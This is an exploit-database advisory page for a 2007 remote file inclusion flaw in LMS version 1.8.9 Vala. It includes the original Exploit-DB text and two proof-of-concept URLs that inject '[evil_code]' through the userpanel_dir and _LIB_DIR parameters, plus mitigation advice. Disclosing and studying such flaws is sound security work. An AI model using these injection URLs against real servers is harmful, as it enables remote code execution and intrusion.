header-logo
Suggest Exploit
vendor:
LMS
by:
Kacper
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: LMS
Affected Version From: LMS version 1.8.9 and below
Affected Version To: LMS version 1.8.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

The LMS <= 1.8.9 Vala script is vulnerable to remote file inclusion attacks. The vulnerabilities can be exploited by an attacker by injecting malicious code into the userpanel_dir and _LIB_DIR parameters. This can lead to arbitrary code execution and unauthorized access to sensitive information.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update LMS to a version higher than 1.8.9. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.


LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/


--------------------------------------------
Vulnerabilities:

http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]

# milw0rm.com [2007-03-22]

Navigation

Suggest Exploit

Services By CQR